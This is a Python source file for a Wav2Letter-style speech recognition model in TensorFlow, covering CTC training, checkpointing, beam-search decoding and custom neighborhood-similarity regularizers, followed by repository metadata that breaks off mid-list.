self.regularizer_coeff = reg[1]\n\n self.model = self.make_w2l_model()\n if os.path.isdir(model_dir) and os.listdir(model_dir):\n print(\"Model directory already exists. Loading last model...\")\n last = self.get_last_model()\n # TODO this is a hack!!!\n # need to properly write the regularizer as a custom Keras object\n # like this, continuing training will not work properly!!!\n #self.model = tf.keras.models.load_model(\n # os.path.join(model_dir, last),\n # custom_objects={\"neighbor_distance\": lambda x: x})\n self.model.load_weights(os.path.join(model_dir, last))\n self.step = int(last[:-3])\n print(\"...loaded {}.\".format(last))\n else:\n print(\"Model directory does not exist. Creating new model...\")\n if not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n self.step = 0\n\n self.writer = tf.summary.create_file_writer(model_dir)\n\n def make_w2l_model(self):\n \"\"\"Creates a Keras model that does the W2L forward computation.\n\n Just goes from mel spectrogram input to logits output.\n\n Returns:\n Keras sequential model.\n\n TODO could allow model configs etc. 
For now, architecture is hardcoded\n\n \"\"\"\n channel_ax = 1 if self.cf else -1\n\n if self.regularizer_type:\n #reg_target, reg_type, reg_edges, reg_size = self.regularizer_type.split(\"_\")\n reg_target, reg_power = self.regularizer_type.split(\"_\")\n\n #def reg_fn_builder(n_f):\n # return sebastians_magic_trick(\n # diff_norm=reg_type, weight_norm=\"l2\", grid_dims=GRIDS[n_f],\n # neighbor_size=int(reg_size),\n # cf=(self.cf and reg_target == \"act\"),\n # edges=reg_edges, on_activities=reg_target == \"act\")\n\n def reg_fn_builder(n_f):\n return jens_magick_trick(\n grid_dims=GRIDS[n_f], cf=(self.cf and reg_target == \"act\"),\n on_activities=reg_target == \"act\",\n power=float(reg_power))\n else:\n reg_target = None\n\n def reg_conv1d(n_f, w_f, stride):\n return layers.Conv1D(\n n_f, w_f, stride, padding=\"same\", data_format=self.data_format,\n use_bias=False,\n kernel_regularizer=reg_fn_builder(\n n_f) if reg_target == \"weight\" else None,\n activity_regularizer=reg_fn_builder(\n n_f) if reg_target == \"act\" else None)\n\n def act(n_f):\n return layers.ReLU(activity_regularizer=reg_fn_builder(\n n_f) if reg_target == \"act\" else None)\n\n @tf.custom_gradient\n def binarizer(inp):\n def straight_through(dy):\n return tf.where(tf.greater(dy, 1.), 0., dy)\n\n return tf.where(tf.greater_equal(inp, 0.), 1., -1.), straight_through\n #actfn = layers.Lambda(binarizer)\n #def act(n_f): return layers.Lambda(binarizer)\n\n layer_list = [\n layers.BatchNormalization(channel_ax),\n reg_conv1d(256, 48, 2),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(2048, 32, 1),\n layers.BatchNormalization(channel_ax),\n act(2048),\n reg_conv1d(2048, 1, 1),\n layers.BatchNormalization(channel_ax),\n act(2048),\n layers.Conv1D(self.vocab_size + 1, 1, 1, \"same\", self.data_format)\n ]\n\n # w2l = tf.keras.Sequential(layer_list, name=\"w2l\")\n\n inp = tf.keras.Input((self.n_channels, None) if self.cf\n else (None, self.n_channels))\n layer_outputs = [inp]\n for layer in layer_list:\n layer_outputs.append(layer(layer_outputs[-1]))\n # only include relu layers in outputs\n relevant = layer_outputs[4::3] + [layer_outputs[-1]]\n\n w2l = tf.keras.Model(inputs=inp, outputs=relevant)\n\n return w2l\n\n def forward(self, audio, training=False, return_all=False):\n \"\"\"Simple forward pass of a W2L model to compute logits.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n training: Bool, if true assuming training mode otherwise inference.\n Important for batchnorm to work properly.\n return_all: Bool, if true, return list of all layer activations\n (post-relu), with the logits at the very end.\n\n Returns:\n Result of applying model to audio (list or tensor depending on\n return_all).\n\n \"\"\"\n if not self.cf:\n audio = tf.transpose(audio, [0, 2, 1])\n\n out = self.model(audio, training=training)\n if return_all:\n return out\n else:\n return out[-1]\n\n 
def train_step(self, audio, audio_length, transcrs, transcr_length,\n optimizer, on_gpu):\n \"\"\"Implements train step of the W2L model.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n audio_length: \"True\" length of each audio clip.\n transcrs: Tensor of transcriptions (indices).\n transcr_length: \"True\" length of each transcription.\n optimizer: Optimizer instance to do training with.\n on_gpu: Bool, whether running on GPU. This changes how the\n transcriptions are handled. Currently ignored!!\n\n Returns:\n Loss value.\n\n \"\"\"\n with tf.GradientTape() as tape:\n logits = self.forward(audio, training=True, return_all=False)\n # after this we need logits in shape time x batch_size x vocab_size\n if self.cf: # bs x v x t -> t x bs x v\n logits_tm = tf.transpose(logits, [2, 0, 1],\n name=\"logits_time_major\")\n else: # channels last: bs x t x v -> t x bs x v\n logits_tm = tf.transpose(logits, [1, 0, 2],\n name=\"logits_time_major\")\n\n audio_length = tf.cast(audio_length / 2, tf.int32)\n\n if False: #on_gpu: # this seems to be slow so we don't use it\n ctc_loss = tf.reduce_mean(tf.nn.ctc_loss(\n labels=transcrs, logits=logits_tm, label_length=transcr_length,\n logit_length=audio_length, logits_time_major=True,\n blank_index=0), name=\"avg_loss\")\n else:\n transcrs_sparse = dense_to_sparse(transcrs, sparse_val=-1)\n ctc_loss = tf.reduce_mean(tf.nn.ctc_loss(\n labels=transcrs_sparse, logits=logits_tm, label_length=None,\n logit_length=audio_length, logits_time_major=True,\n blank_index=0), name=\"avg_loss\")\n\n if self.regularizer_coeff:\n avg_reg_loss = tf.math.add_n(self.model.losses) / len(self.model.losses)\n loss = ctc_loss + self.regularizer_coeff * avg_reg_loss\n else:\n loss = ctc_loss\n avg_reg_loss = 0\n\n grads = tape.gradient(loss, self.model.trainable_variables)\n optimizer.apply_gradients(zip(grads, self.model.trainable_variables))\n\n # probably has to go into train_full...\n #self.annealer.update_history(loss)\n\n return ctc_loss, avg_reg_loss\n\n def train_full(self, dataset, steps, adam_params, on_gpu):\n \"\"\"Full training logic for W2L.\n\n Parameters:\n dataset: tf.data.Dataset as produced in input.py.\n steps: Number of training steps.\n adam_params: List/tuple of four parameters for Adam: learning rate,\n beta1, beta2, epsilon.\n on_gpu: Bool, whether running on a GPU.\n\n \"\"\"\n # TODO more flexible checkpointing. 
this will simply do 10 checkpoints overall\n check_freq = steps // 10\n data_step_limited = dataset.take(steps)\n\n # TODO use annealing\n #self.annealer = AnnealIfStuck(adam_params[0], 0.1, 20000)\n # TODO don't hardcode this\n schedule = tf.optimizers.schedules.PiecewiseConstantDecay(\n [200000, 250000], [adam_params[0], adam_params[0]/10,\n adam_params[0]/(5*10)])\n opt = tf.optimizers.Adam(schedule, *adam_params[1:])\n opt.iterations.assign(self.step)\n\n audio_shape = [None, self.n_channels, None] if self.cf \\\n else [None, None, self.n_channels]\n\n def train_fn(w, x, y, z):\n return self.train_step(w, x, y, z, opt, on_gpu)\n\n graph_train = tf.function(\n train_fn, input_signature=[tf.TensorSpec(audio_shape, tf.float32),\n tf.TensorSpec([None], tf.int32),\n tf.TensorSpec([None, None], tf.int32),\n tf.TensorSpec([None], tf.int32)])\n # graph_train = train_fn # skip tf.function\n\n start = time.time()\n for features, labels in data_step_limited:\n if not self.step % check_freq:\n print(\"Saving checkpoint...\")\n self.model.save(os.path.join(\n self.model_dir, str(self.step).zfill(6) + \".h5\"))\n\n ctc, reg_loss = graph_train(features[\"audio\"], features[\"length\"],\n labels[\"transcription\"], labels[\"length\"])\n\n if not self.step % 500:\n stop = time.time()\n print(\"Step: {}. CTC: {}\".format(self.step, ctc.numpy()))\n print(\"{} seconds passed...\".format(stop-start))\n\n if not self.step % 100:\n with self.writer.as_default():\n tf.summary.scalar(\"loss/ctc\", ctc, step=self.step)\n if self.regularizer_coeff:\n tf.summary.scalar(\"loss/nd_reg\", reg_loss,\n step=self.step)\n\n self.step += 1\n\n self.model.save_weights(os.path.join(\n self.model_dir, str(self.step).zfill(6) + \".h5\"))\n\n def decode(self, audio, audio_length, return_intermediate=False):\n \"\"\"Wrapper to decode using W2L model.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n audio_length: \"True\" length of each audio clip.\n return_intermediate: Bool; if true, return intermediate layer\n results in addition to the decodings.\n\n Returns:\n Sparse or dense tensor with the top predictions.\n If return_intermediate is True, output is a tuple, first element\n being the predictions and second element a list of intermediate\n outputs.\n\n \"\"\"\n forward = self.forward(audio, training=False,\n return_all=return_intermediate)\n if return_intermediate:\n logits = forward[-1]\n else:\n logits = forward\n\n if self.cf:\n logits = tf.transpose(logits, [2, 0, 1])\n else:\n logits = tf.transpose(logits, [1, 0, 2])\n\n decoded = self.ctc_decode_top(logits, audio_length, pad_val=-1)\n if return_intermediate:\n return decoded, forward\n else:\n return decoded\n\n def ctc_decode_top(self, logits, seq_lengths, beam_width=100, pad_val=-1,\n as_sparse=False):\n \"\"\"Simpler version of ctc decoder that only returns the top result.\n\n Parameters:\n logits: Passed straight to ctc decoder. This has to be time-major\n and channels_last!!\n seq_lengths: Same.\n beam_width: Same.\n pad_val: Value to use to pad dense tensor. 
No effect if as_sparse is\n True.\n as_sparse: If True, return results as sparse tensor.\n\n Returns:\n Sparse or dense tensor with the top predictions.\n\n \"\"\"\n with tf.name_scope(\"decoding\"):\n decoded_sparse_list, _ = tf.nn.ctc_beam_search_decoder(\n logits, seq_lengths//2, beam_width=beam_width, top_paths=1)\n decoded_sparse = decoded_sparse_list[0]\n decoded_sparse = tf.cast(decoded_sparse, tf.int32)\n if as_sparse:\n return decoded_sparse\n else:\n # this should result in a bs x t matrix of predicted classes\n return tf.sparse.to_dense(decoded_sparse,\n default_value=pad_val,\n name=\"dense_decoding\")\n\n def get_last_model(self):\n ckpts = [file for file in os.listdir(self.model_dir) if file.endswith(\".h5\")]\n if \"final.h5\" in ckpts:\n return \"final.h5\"\n else:\n return sorted(ckpts)[-1]\n\n\nclass AnnealIfStuck(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, base_lr, factor, n_steps):\n \"\"\"Anneal the learning rate if loss doesn't decrease anymore.\n\n Refer to\n http://blog.dlib.net/2018/02/automatic-learning-rate-scheduling-that.html.\n\n Parameters:\n base_lr: LR to start with.\n factor: By what to multiply in case we're stuck.\n n_steps: How often to check if we're stuck.\n\n \"\"\"\n super(AnnealIfStuck, self).__init__()\n self.n_steps = n_steps\n self.lr = base_lr\n self.factor = factor\n self.loss_history = tf.Variable(\n np.zeros(n_steps), trainable=False, dtype=tf.float32,\n name=\"loss_history\")\n\n def __call__(self, step):\n if tf.logical_or(tf.greater(tf.math.mod(step, self.n_steps), 0),\n tf.equal(step, 0)):\n pass\n else:\n x1 = tf.range(self.n_steps, dtype=tf.float32, name=\"x\")\n x2 = tf.ones([self.n_steps], dtype=tf.float32, name=\"bias\")\n x = tf.stack((x1, x2), axis=1, name=\"input\")\n slope_bias = tf.linalg.lstsq(x, self.loss_history[:, tf.newaxis],\n name=\"solution\")\n slope = slope_bias[0][0]\n bias = slope_bias[1][0]\n preds = slope * x1 + bias\n\n data_var = 1 / (self.n_steps - 2) * tf.reduce_sum(\n tf.square(self.loss_history - preds))\n dist_var = 12 * data_var / (self.n_steps ** 3 - self.n_steps)\n dist = tfp.distributions.Normal(slope, tf.sqrt(dist_var),\n name=\"slope_distribution\")\n prob_decreasing = dist.cdf(0., name=\"prob_below_zero\")\n\n if tf.less_equal(prob_decreasing, 0.5):\n self.lr *= self.factor\n return self.lr\n\n def check_lr(self):\n return self.lr\n\n def update_history(self, new_val):\n self.loss_history.assign(tf.concat((self.loss_history[1:], [new_val]),\n axis=0))\n\n\ndef dense_to_sparse(dense_tensor, sparse_val=-1):\n \"\"\"Inverse of tf.sparse_to_dense.\n\n Parameters:\n dense_tensor: The dense tensor. 
Duh.\n sparse_val: The value to \"ignore\": Occurrences of this value in the\n dense tensor will not be represented in the sparse tensor.\n NOTE: When/if later restoring this to a dense tensor, you\n will probably want to choose this as the default value.\n\n Returns:\n SparseTensor equivalent to the dense input.\n\n \"\"\"\n with tf.name_scope(\"dense_to_sparse\"):\n sparse_inds = tf.where(tf.not_equal(dense_tensor, sparse_val),\n name=\"sparse_inds\")\n sparse_vals = tf.gather_nd(dense_tensor, sparse_inds,\n name=\"sparse_vals\")\n dense_shape = tf.shape(dense_tensor, name=\"dense_shape\",\n out_type=tf.int64)\n return tf.SparseTensor(sparse_inds, sparse_vals, dense_shape)\n\n\ndef sebastians_magic_trick(diff_norm, weight_norm, grid_dims, neighbor_size,\n cf, edges, on_activities):\n \"\"\"Creates a neighborhood distance regularizer.\n\n Parameters:\n diff_norm: How to compute differences/distances between filters.\n Can be \"l1\", \"l2\" or \"linf\" for respective norms, or \"cos\"\n for cosine distance..\n weight_norm: How to compute neighborhood weightings, i.e. how points\n further away in the neighborhood play into the overall\n penalty. Options same as for diff_norm, except for \"cos\".\n grid_dims: 2-tuple or list giving the desired grid dimensions. Has to\n match the number of filters for the layer to regularize.\n neighbor_size: int, giving the size of the neighborhood. Must be odd.\n E.g. giving 3 here will cause each filter to treat the\n immediately surrounding filters (including diagonally)\n as its neighborhood.\n cf: Whether the regularizer target will be channels_first. Should only\n be true if we are regularizing activation maps, not filter weights,\n and channels_first data format is used. If on_activities is False,\n this is ignored.\n edges: String, how to treat edges. See CLI file for options.\n on_activities: Bool; if True, we assume that we are working on\n activities, which is slightly different than when\n working on kernels (if False, kernels are assumed).\n\n \"\"\"\n if not neighbor_size % 2:\n raise ValueError(\"Neighborhood is not odd; this would mean no middle \"\n \"point!\")\n if edges not in {\"no\", \"occ\", \"wrap\", \"mirror\"}:\n raise ValueError(\"Invalid edge option specified: {}. 
Valid are 'no', \"\n \"'occ' and 'wrap'.\".format(edges))\n\n # first we compute the possible offsets around a given point\n neighbors_per_direction = (neighbor_size - 1) // 2\n neighbor_offsets = []\n for offset_x in range(-neighbors_per_direction,\n neighbors_per_direction + 1):\n for offset_y in range(-neighbors_per_direction,\n neighbors_per_direction + 1):\n if offset_x == 0 and offset_y == 0:\n continue # skip center\n neighbor_offsets.append([offset_x, offset_y])\n neighbor_offsets = np.asarray(neighbor_offsets, dtype=np.int32)\n\n len_x = grid_dims[0]\n len_y = grid_dims[1]\n filters_total = len_x * len_y\n\n # get neighbors for each filter\n neighbor_lists = []\n for ci in range(filters_total):\n neighbors = []\n # derive x and y coordinate in filter space\n cy = ci % len_y\n cx = ci // len_y\n for offset in neighbor_offsets:\n offset_x = cx + offset[0]\n offset_y = cy + offset[1]\n\n if edges == \"wrap\":\n if offset_x < 0:\n offset_x += len_x\n elif offset_x >= len_x:\n offset_x -= len_x\n if offset_y < 0:\n offset_y += len_y\n elif offset_y >= len_y:\n offset_y -= len_y\n\n elif edges == \"mirror\":\n if offset_x < 0:\n offset_x = -offset_x\n elif offset_x >= len_x:\n d = offset_x - (len_x - 1)\n offset_x = len_x - 1 - d\n\n if offset_y < 0:\n offset_y -= offset_y\n elif offset_y >= len_y:\n d = offset_y - (len_y - 1)\n offset_y = len_y - 1 - d\n\n if 0 <= offset_x < len_x and 0 <= offset_y < len_y:\n # add neighbor if valid coordinate\n ni = offset_y * len_x + offset_x\n neighbors.append(ni)\n neighbor_lists.append(neighbors)\n\n # filter neighbor lists to only contain full neighborhoods\n center_ids = []\n neighbor_ids = []\n for ci, nis in enumerate(neighbor_lists):\n # e.g. in a 5x5 grid there are max. 24 neighbors\n if len(nis) == neighbor_size**2 - 1:\n center_ids.append(ci)\n neighbor_ids.append(nis)\n center_ids = np.asarray(center_ids, dtype=np.int32)\n neighbor_ids = np.asarray(neighbor_ids, dtype=np.int32)\n\n # weigh points further away in the neighborhood less\n neighbor_weights = []\n for offsets in neighbor_offsets:\n if weight_norm == \"l1\":\n d = np.abs(offsets).sum()\n elif weight_norm == \"l2\":\n d = np.sqrt((offsets*offsets).sum())\n elif weight_norm == \"linf\":\n d = np.abs(offsets).max()\n else:\n raise ValueError(\"Invalid weight norm specified: {}. \"\n \"Valid are 'l1', 'l2', \"\n \"'linf'.\".format(weight_norm))\n w = 1. 
/ d\n neighbor_weights.append(w)\n neighbor_weights = np.asarray(neighbor_weights, dtype=np.float32)\n\n if edges == \"occ\":\n # less often occurring positions are weighted more\n index_occurrences = defaultdict(int)\n for neighborhood in neighbor_ids:\n for neighbor in neighborhood:\n index_occurrences[neighbor] += 1\n\n max_occur = max(index_occurrences.values())\n\n neighbor_weights_occ = np.zeros(\n (len(neighbor_ids), len(neighbor_weights)),\n dtype=np.float32)\n for row in range(len(neighbor_ids)):\n for col in range(len(neighbor_weights)):\n occs_here = index_occurrences[neighbor_ids[row][col]]\n neighbor_weights_occ[row, col] = (neighbor_weights[col] *\n max_occur / occs_here)\n neighbor_weights = neighbor_weights_occ\n else:\n neighbor_weights = np.tile(neighbor_weights, reps=[len(center_ids), 1])\n\n neighbor_weights /= neighbor_weights.sum() # normalize to sum=1\n\n # now convert numpy arrays to tf constants\n tf_neighbor_weights = tf.constant(neighbor_weights,\n name='neighbor_weights')\n tf_center_ids = tf.constant(center_ids, name='center_ids')\n tf_neighbor_ids = tf.constant(neighbor_ids, name='neighbor_ids')\n\n def neighbor_distance(inputs):\n \"\"\"If cf is true we assume channels first. Otherwise last, this also\n covers the case where the inputs are filter weights!\n \"\"\"\n\n # TODO mask\n # TODO \"factorize\" over batch (or time?)\n if on_activities:\n if cf:\n n_filters = inputs.shape[1]\n else:\n n_filters = inputs.shape[-1]\n n_batch = inputs.shape[0]\n else:\n n_filters = inputs.shape[-1]\n n_batch = 1 # could also treat input channels as \"batch axis\"\n if n_filters != filters_total:\n raise ValueError(\n \"Unsuitable grid for weight {}. \"\n \"Grid dimensions: {}, {} for a total of {} entries. \"\n \"Filters in weight: {}.\".format(\n inputs.name, len_x, len_y, filters_total, n_filters))\n # reshape to n_filters x batch x d\n # in case of activities, d = t (or w*h or whatever)\n # in case of kernels, d = kernel_w*in_channels and batch = 1\n if on_activities:\n if cf:\n perm = [1, 0] + list(range(2, len(inputs.shape)))\n else:\n perm = [len(inputs.shape) - 1, 0] + list(range(1, len(inputs.shape) - 1))\n inputs = tf.transpose(inputs, perm)\n inputs = tf.reshape(inputs, [n_filters, n_batch, -1])\n else:\n inputs = tf.reshape(inputs, [-1, n_batch, n_filters])\n inputs = tf.transpose(inputs, [2, 1, 0])\n\n if diff_norm == \"l1\":\n # to prevent weights from just shrinking (instead of getting\n # more similar) we apply a \"global\" normalization\n # note that local normalization (normalizing each filter\n # separately) would ignore scale differences between filters,\n # thus not forcing them to be \"equal\" properly\n # TODO maybe this makes weights too small?\n # maybe local normalization is enough? 
cosine similarity\n # basically does the same thing...\n inputs = inputs / (tf.norm(inputs, ord=1) + 1e-8)\n elif diff_norm == \"l2\":\n inputs = inputs / (tf.norm(inputs) + 1e-8)\n elif diff_norm == \"linf\":\n inputs = inputs / (tf.norm(inputs, ord=np.inf) + 1e-8)\n\n # reshape to n_centers x 1 x d for broadcasting\n tf_centers = tf.gather(inputs, tf_center_ids)\n tf_centers = tf.expand_dims(tf_centers, 1)\n\n # n_centers x n_neighbors x d\n tf_neighbors = tf.gather(inputs, tf_neighbor_ids)\n\n # compute pairwise distances, then weight, then sum up\n # pairwise is always n_centers x n_neighbors\n if diff_norm == \"l1\":\n pairwise = tf.reduce_sum(tf.abs(tf_centers - tf_neighbors),\n axis=-1)\n elif diff_norm == \"l2\":\n pairwise = tf.sqrt(\n tf.reduce_sum((tf_centers - tf_neighbors)**2, axis=-1))\n elif diff_norm == \"linf\":\n pairwise = tf.reduce_max(tf.abs(tf_centers - tf_neighbors),\n axis=-1)\n elif diff_norm == \"cos\":\n dotprods = tf.reduce_sum(tf_centers * tf_neighbors, axis=-1)\n center_norms = tf.norm(tf_centers, axis=-1)\n neighbor_norms = tf.norm(tf_neighbors, axis=-1)\n # NOTE this computes cosine *similarity* which is why we\n # multiply by -1: minimize the negative similarity!\n cosine_similarity = dotprods / (center_norms * neighbor_norms +\n 1e-8)\n pairwise = -1 * cosine_similarity\n else:\n raise ValueError(\"Invalid difference norm specified: {}. \"\n \"Valid are 'l1', 'l2', 'linf', \"\n \"'cos'.\".format(weight_norm))\n pw_mean_over_batch = tf.reduce_mean(pairwise, axis=-1)\n pairwise_weighted = tf_neighbor_weights * pw_mean_over_batch\n\n # keras divides activity regularizer by batch size.....\n # so we counteract that there\n factor = tf.cast(tf.shape(inputs)[0], tf.float32) if on_activities else 1.\n return factor * tf.reduce_sum(pairwise_weighted)\n\n return neighbor_distance\n\n\ndef jens_magick_trick(grid_dims, cf, on_activities, power=1., test=False):\n len_x = grid_dims[0]\n len_y = grid_dims[1]\n filters_total = len_x * len_y\n\n # get x,y coord in grid for each filter\n xy_coords = []\n for ci in range(filters_total):\n cy = ci % len_y\n cx = ci // len_y\n xy_coords.append((cx, cy))\n xy_coords = np.array(xy_coords, dtype=np.float32)\n\n # use euclidean or whatever\n distance_mat = np.sqrt(\n np.sum((xy_coords[None, :] - xy_coords[:, None]) ** 2, axis=-1))\n # distance_mat = np.sum(np.abs(xy_coords[None, :] - xy_coords[:, None]), axis=-1)\n\n # normalize\n # could do extremely nonlinear re-scaling, thresholding etc.\n # for now, just scale to [-1, 1]\n distance_mat = np.power(distance_mat, power)\n sim_mat_g = -distance_mat\n sim_mat_g -= sim_mat_g.min() # relies on distances being >= 0 and 0 for identical positions (main diagonal)\n sim_mat_g /= sim_mat_g.max()\n\n if test:\n return distance_mat, sim_mat_g\n\n sim_mat_g = tf.constant(sim_mat_g)\n\n def neighbor_distance(inputs):\n if on_activities:\n if cf:\n n_filters = inputs.shape[1]\n else:\n n_filters = inputs.shape[-1]\n n_batch = tf.shape(inputs)[0]\n else:\n n_filters = inputs.shape[-1]\n n_batch = 1 # could also treat input channels as \"batch axis\"\n if n_filters != filters_total:\n raise ValueError(\n \"Unsuitable grid for weight {}. \"\n \"Grid dimensions: {}, {} for a total of {} entries. 
\"\n \"Filters in weight: {}.\".format(\n inputs.name, len_x, len_y, filters_total, n_filters))\n # reshape to n_filters x batch x d\n # in case of activities, d = t (or w*h or whatever)\n # in case of kernels, d = kernel_w*in_channels and batch = 1\n if on_activities:\n if not cf:\n perm = [0, len(inputs.shape) - 1] + list(range(1, len(inputs.shape) - 1))\n inputs = tf.transpose(inputs, perm)\n inputs = tf.reshape(inputs, [n_batch, n_filters, -1])\n else:\n inputs = tf.reshape(inputs, [-1, n_batch, n_filters])\n inputs = tf.transpose(inputs, [1, 2, 0])\n\n # compute ALL similarities!!!!!!!!1\n sim_mat = tf.matmul(inputs, tf.transpose(inputs, [0, 2, 1]))\n norms = tf.norm(inputs, axis=-1)\n sim_mat = sim_mat / (norms[:, tf.newaxis, :] * norms[:, :, tf.newaxis] + 1e-8)\n\n sim_mat *= sim_mat_g\n # keras divides activity regularizer by batch size.....\n # so we counteract that there\n factor = tf.cast(tf.shape(inputs)[0], tf.float32) if on_activities else 1.\n return factor * -tf.reduce_mean(sim_mat) / tf.reduce_mean(sim_mat_g)\n\n return neighbor_distance\n", "repo_name": "xdurch0/asr2", "sub_path": "w2l/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 31430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary.create_file_writer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.where", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.custom_gradient", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 107, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 109, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 112, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 115, "usage_type": "name"}, 
{"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 118, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 121, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 124, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 127, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 130, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 133, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 136, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 139, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 141, "usage_type": "name"}, {"api_name": "tensorflow.keras.Input", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tensorflow.transpose", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 209, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 209, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 212, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_loss", "line_number": 212, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 212, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_loss", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.math.add_n", "line_number": 224, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 224, "usage_type": "attribute"}, {"api_name": "tensorflow.optimizers.schedules.PiecewiseConstantDecay", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.optimizers", "line_number": 256, "usage_type": "attribute"}, {"api_name": "tensorflow.optimizers.Adam", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.optimizers", "line_number": 259, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 268, "usage_type": "call"}, 
